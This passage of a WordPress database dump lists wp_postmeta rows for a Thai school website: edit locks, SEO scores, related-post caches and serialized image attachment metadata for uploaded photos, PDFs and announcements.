(11752, 5194, '_yoast_wpseo_primary_category', '31'),
(11753, 5194, '_wpas_done_all', '1'),
(11754, 5194, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575387399;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5169;}i:1;a:1:{s:2:\"id\";i:6322;}i:2;a:1:{s:2:\"id\";i:5936;}}}}'),
(11755, 5197, '_edit_lock', '1550472309:3'),
(11756, 5197, '_edit_last', '3'),
(11757, 5198, '_wp_attached_file', '2019/02/52013984_762652684110922_3135398942955536384_o.jpg'),
(11758, 5198, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/02/52013984_762652684110922_3135398942955536384_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52013984_762652684110922_3135398942955536384_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52013984_762652684110922_3135398942955536384_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52013984_762652684110922_3135398942955536384_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52013984_762652684110922_3135398942955536384_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52013984_762652684110922_3135398942955536384_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11759, 5197, '_thumbnail_id', '5198'),
(11763, 5197, '_hide_featured', NULL),
(11764, 5197, '_yoast_wpseo_content_score', '30'),
(11765, 5197, '_yoast_wpseo_primary_category', '31'),
(11766, 5197, '_wpas_done_all', '1'),
(11767, 5200, '_edit_lock', '1550472610:3'),
(11768, 5200, '_edit_last', '3'),
(11769, 5201, '_wp_attached_file', '2019/02/18-2-2562-13-49-05.png'),
(11770, 5201, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:514;s:6:\"height\";i:818;s:4:\"file\";s:30:\"2019/02/18-2-2562-13-49-05.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-2-2562-13-49-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-2-2562-13-49-05-189x300.png\";s:5:\"width\";i:189;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-2-2562-13-49-05-189x300.png\";s:5:\"width\";i:189;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11771, 5202, '_wp_attached_file', '2019/02/52094036_764251240617733_2972909377981251584_o.jpg'),
(11772, 5202, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/02/52094036_764251240617733_2972909377981251584_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52094036_764251240617733_2972909377981251584_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52094036_764251240617733_2972909377981251584_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52094036_764251240617733_2972909377981251584_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52094036_764251240617733_2972909377981251584_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52094036_764251240617733_2972909377981251584_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11773, 5200, '_thumbnail_id', '5202'),
(11777, 5200, '_hide_featured', NULL),
(11778, 5200, '_yoast_wpseo_content_score', '30'),
(11779, 5200, '_yoast_wpseo_primary_category', '31'),
(11780, 5200, '_wpas_done_all', '1'),
(11781, 5200, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575578275;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4739;}i:1;a:1:{s:2:\"id\";i:4735;}i:2;a:1:{s:2:\"id\";i:6306;}}}}'),
(11782, 5197, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575608356;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6316;}i:1;a:1:{s:2:\"id\";i:5104;}i:2;a:1:{s:2:\"id\";i:5733;}}}}'),
(11783, 5212, '_edit_lock', '1550645581:3'),
(11784, 5212, '_edit_last', '3'),
(11785, 5212, '_hide_featured', NULL),
(11786, 5212, '_yoast_wpseo_content_score', '60'),
(11787, 5222, '_edit_lock', '1550646740:3'),
(11788, 5222, '_edit_last', '3'),
(11789, 5224, '_edit_lock', '1550646028:3'),
(11790, 5224, '_edit_last', '3'),
(11791, 5224, '_hide_featured', NULL),
(11792, 5224, '_yoast_wpseo_content_score', '90'),
(11793, 5228, '_edit_lock', '1550646339:3'),
(11794, 5229, '_wp_attached_file', '2019/02/วิสัยทัศน์และยุทธศาสตร์-ปี-พ.ศ.-2554.doc'),
(11795, 5228, '_edit_last', '3'),
(11796, 5228, '_hide_featured', NULL),
(11797, 5228, '_yoast_wpseo_content_score', '60'),
(11798, 5232, '_edit_lock', '1550646487:3'),
(11799, 5232, '_edit_last', '3'),
(11800, 5232, '_hide_featured', NULL),
(11801, 5232, '_yoast_wpseo_content_score', '60'),
(11802, 5222, '_hide_featured', NULL),
(11803, 5222, '_yoast_wpseo_content_score', '90'),
(11805, 5244, '_wp_attached_file', '2019/02/cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52.jpg'),
(11806, 5244, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:198;s:4:\"file\";s:88:\"2019/02/cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:88:\"cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:87:\"cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52-300x63.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:88:\"cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52-768x162.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:87:\"cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52-400x84.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11807, 930, '_yoast_wpseo_content_score', '60'),
(11808, 5261, '_wp_attached_file', '2019/02/แผนโครงการกิจกรรมชมรมและองค์การวิชาชีพ-2-61.pdf'),
(11809, 1699, '_yoast_wpseo_content_score', '60'),
(11810, 5267, '_wp_attached_file', '2019/02/ข้อมูลงบประมาณ-ปีการศึกษา-2562.pdf'),
(11811, 1399, '_yoast_wpseo_content_score', '90'),
(11812, 5273, '_wp_attached_file', '2018/01/นายอานุภาพ-วาสะสิริ.png'),
(11813, 5273, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:241;s:6:\"height\";i:327;s:4:\"file\";s:67:\"2018/01/นายอานุภาพ-วาสะสิริ.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:67:\"นายอานุภาพ-วาสะสิริ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:67:\"นายอานุภาพ-วาสะสิริ-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:67:\"นายอานุภาพ-วาสะสิริ-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11816, 5275, '_wp_attached_file', '2019/02/26-2-2562-9-04-45.png'),
(11817, 5275, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1003;s:6:\"height\";i:718;s:4:\"file\";s:29:\"2019/02/26-2-2562-9-04-45.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"26-2-2562-9-04-45-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"26-2-2562-9-04-45-300x215.png\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"26-2-2562-9-04-45-768x550.png\";s:5:\"width\";i:768;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"26-2-2562-9-04-45-400x286.png\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11818, 5277, '_edit_lock', '1551242799:3'),
(11819, 5277, '_edit_last', '3'),
(11820, 5278, '_wp_attached_file', '2019/02/ตารางเวร-เดือนมีนาคม-2562.pdf'),
(11824, 5277, '_hide_featured', NULL),
(11825, 5277, '_yoast_wpseo_content_score', '60'),
(11826, 5277, '_yoast_wpseo_primary_category', '3'),
(11827, 5277, '_wpas_done_all', '1'),
(11828, 5277, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575441783;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5361;}i:1;a:1:{s:2:\"id\";i:4786;}i:2;a:1:{s:2:\"id\";i:5124;}}}}'),
(11829, 5281, '_edit_lock', '1551343278:3'),
(11830, 5281, '_edit_last', '3'),
(11831, 5282, '_wp_attached_file', '2019/02/ประกาศ-การประเมินผลกิจกรรมนักเรียน-นักศึกษา-ภาคเรียนที่-๒-ปีการศึกษา-๒๕๖๑.pdf'),
(11835, 5281, '_hide_featured', NULL),
(11836, 5281, '_yoast_wpseo_content_score', '60'),
(11837, 5281, '_yoast_wpseo_primary_category', '3'),
(11838, 5281, '_wpas_done_all', '1'),
(11839, 5284, '_edit_lock', '1551343460:3'),
(11840, 5284, '_edit_last', '3'),
(11841, 5285, '_wp_attached_file', '2019/02/ประกาศ-หลักเกณฑ์การซ่อมเสริมกิจกรรมชมรมวิชาชีพของนักเรียน-นักศึกษา.pdf'),
(11845, 5284, '_hide_featured', NULL),
(11846, 5284, '_yoast_wpseo_content_score', '60'),
(11847, 5284, '_yoast_wpseo_primary_category', '3'),
(11848, 5284, '_wpas_done_all', '1'),
(11849, 5287, '_edit_lock', '1551343718:3'),
(11850, 5287, '_edit_last', '3'),
(11851, 5288, '_wp_attached_file', '2019/02/ประกาศ-แนวปฏิบัติการประเมินผลการเข้าร่วมกิจกรรมชมรมวิชาชีพของนักเรียน-นักศึกษา.pdf'),
(11855, 5287, '_hide_featured', NULL),
(11856, 5287, '_yoast_wpseo_content_score', '60'),
(11857, 5287, '_yoast_wpseo_primary_category', '3'),
(11858, 5287, '_wpas_done_all', '1'),
(11860, 5287, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574932252;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(11861, 5281, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575162871;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(11862, 5284, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574785363;s:7:\"payload\";a:0:{}}}'),
(11863, 5291, '_edit_lock', '1551672209:3'),
(11864, 5291, '_edit_last', '3'),
(11865, 5292, '_wp_attached_file', '2019/03/52838881_768286530214204_6539893937945968640_o.jpg'),
(11866, 5292, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/03/52838881_768286530214204_6539893937945968640_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52838881_768286530214204_6539893937945968640_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52838881_768286530214204_6539893937945968640_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52838881_768286530214204_6539893937945968640_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52838881_768286530214204_6539893937945968640_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52838881_768286530214204_6539893937945968640_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11867, 5291, '_thumbnail_id', '5292'),
(11871, 5291, '_hide_featured', NULL),
(11872, 5291, '_yoast_wpseo_content_score', '30'),
(11873, 5291, '_yoast_wpseo_primary_category', '31'),
(11874, 5291, '_wpas_done_all', '1'),
(11875, 5294, '_edit_lock', '1551672698:3'),
(11876, 5294, '_edit_last', '3'),
(11877, 5295, '_wp_attached_file', '2019/03/4-3-2562-11-10-56.png'),
(11878, 5295, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:511;s:6:\"height\";i:765;s:4:\"file\";s:29:\"2019/03/4-3-2562-11-10-56.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-3-2562-11-10-56-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-3-2562-11-10-56-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-3-2562-11-10-56-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11879, 5296, '_wp_attached_file', '2019/03/52929868_769411190101738_8835524970923687936_o.jpg'),
(11880, 5296, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/03/52929868_769411190101738_8835524970923687936_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52929868_769411190101738_8835524970923687936_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52929868_769411190101738_8835524970923687936_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52929868_769411190101738_8835524970923687936_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52929868_769411190101738_8835524970923687936_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52929868_769411190101738_8835524970923687936_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11881, 5294, '_thumbnail_id', '5296'),
(11885, 5294, '_hide_featured', NULL),
(11886, 5294, '_yoast_wpseo_content_score', '30'),
(11887, 5294, '_yoast_wpseo_primary_category', '31'),
(11888, 5294, '_wpas_done_all', '1'),
(11889, 5298, '_edit_lock', '1551672871:3'),
(11890, 5298, '_edit_last', '3'),
(11891, 5299, '_wp_attached_file', '2019/03/53150427_769838633392327_3739338681270403072_o.jpg'),
(11892, 5299, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1616;s:6:\"height\";i:1080;s:4:\"file\";s:58:\"2019/03/53150427_769838633392327_3739338681270403072_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"53150427_769838633392327_3739338681270403072_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"53150427_769838633392327_3739338681270403072_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"53150427_769838633392327_3739338681270403072_o-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"53150427_769838633392327_3739338681270403072_o-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"53150427_769838633392327_3739338681270403072_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11893, 5298, '_thumbnail_id', '5299'),
(11897, 5298, '_hide_featured', NULL),
(11898, 5298, '_yoast_wpseo_content_score', '30'),
(11899, 5298, '_yoast_wpseo_primary_category', '31'),
(11900, 5298, '_wpas_done_all', '1'),
(11901, 5301, '_edit_lock', '1551674868:3'),
(11902, 5301, '_edit_last', '3'),
(11903, 5302, '_wp_attached_file', '2019/03/53110910_772078736501650_4335834343613136896_o.jpg'),
(11904, 5302, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/03/53110910_772078736501650_4335834343613136896_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"53110910_772078736501650_4335834343613136896_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"53110910_772078736501650_4335834343613136896_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"53110910_772078736501650_4335834343613136896_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"53110910_772078736501650_4335834343613136896_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"53110910_772078736501650_4335834343613136896_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11905, 5301, '_thumbnail_id', '5302'),
(11909, 5301, '_hide_featured', NULL),
(11910, 5301, '_yoast_wpseo_content_score', '30'),
(11911, 5301, '_yoast_wpseo_primary_category', '31'),
(11912, 5301, '_wpas_done_all', '1'),
(11913, 5301, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574276154;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5865;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:5926;}}}}'),
(11914, 5294, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575745929;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:5147;}i:2;a:1:{s:2:\"id\";i:5200;}}}}'),
(11915, 5298, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575606344;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4964;}i:1;a:1:{s:2:\"id\";i:4718;}i:2;a:1:{s:2:\"id\";i:6161;}}}}'),
(11916, 5291, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575630783;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5301;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:6138;}}}}'),
(11917, 5304, '_wp_attached_file', '2019/03/5-3-2562-15-07-44.png'),
